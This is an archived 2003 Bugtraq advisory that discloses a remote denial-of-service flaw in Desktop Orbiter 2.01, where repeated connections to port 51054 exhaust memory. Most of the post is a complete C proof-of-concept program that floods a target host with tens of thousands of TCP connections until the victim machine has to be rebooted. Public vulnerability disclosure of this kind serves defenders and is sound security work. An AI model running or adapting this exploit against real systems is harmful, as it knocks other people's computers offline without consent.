| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030530130825.2951.qmail@www.securityfocus.com>
Date: 30 May 2003 13:08:25 -0000
From: Luca Ercoli <luca.ercoli@...ind.it>
To: bugtraq@...urityfocus.com
Subject: Remote DoS in Desktop Orbiter
SUMMARY: Desktop Orbiter (www.anfibia.it) is a client-server application
that allow you to administer and secure your network.
VULNERABILITY
DESCRIPTION: At every connection to port 51054(of the server), a snapshot
preview of the desktop is loaded in memory;
by creating many connections to this port a remote attacker
can fill the virtual memory and flood user with mass errors
messages (like: virtual memory insufficent, exception
error,out of memory and Desktop Orbitter's errors).
The application must be killed to regain normal
functionality of the system, but it's hard to do because any
process can't be executed and right bottom of the mouse
(usefull for kill process) is disallowed by errors messages;
At the end of attack, user must reboot computer.
PLATFORM AFFECTED: Desktop Orbiter 2.01 (prior?)
EXPLOIT:
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#define PORT 51054
int main(int argc, char *argv[]){
int sockfd;
struct hostent *he;
struct sockaddr_in their_addr;
int c;
int n;
char *host = NULL;
int cnt=1;
if(argc < 2 ) {
printf("Usage:%s -h <host>\n",argv[0]);
exit(0);
}
while((n = getopt(argc, argv, "h")) != -1) {
switch(n) {
case 'h':
host = optarg;
break;
default:
printf("Bad Input\n");
exit(0);
}
}
if ((he = gethostbyname(argv[2])) == NULL)
{
herror("gethostbyname");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = *((struct in_addr *) he->h_addr);
bzero(&(their_addr.sin_zero), 8);
printf
("\n\n\t\t#########################################################\n");
printf("\t\t# Proof of Concept by Luca Ercoli luca.ercoli@...ind.it #\n");
printf("\t\t# Desktop Orbiter 2.01 Denial of Service #\n");
printf
("\t\t#########################################################\n\n");
printf("\nAttacking....\n\a");
if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket");
exit(1);
}
if (connect (sockfd, (struct sockaddr *) &their_addr,sizeof(struct
sockaddr)) == -1)
{
perror("connect");
exit(0);
}
for (c=0;c<99500;c++){
if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
perror("socket");
exit(1);
}
if (connect (sockfd, (struct sockaddr *) &their_addr,
sizeof(struct sockaddr)) == -1)
{
printf("\n[Attack status] Step %d/25 : Complete!",cnt);
if (cnt == 25) {
printf("\nAttack Complete!\n\n\a");
exit(0);
}
cnt++;
sleep(1);
}
close(sockfd);
}
printf("\n");
return 1;
}
Powered by blists - more mailing lists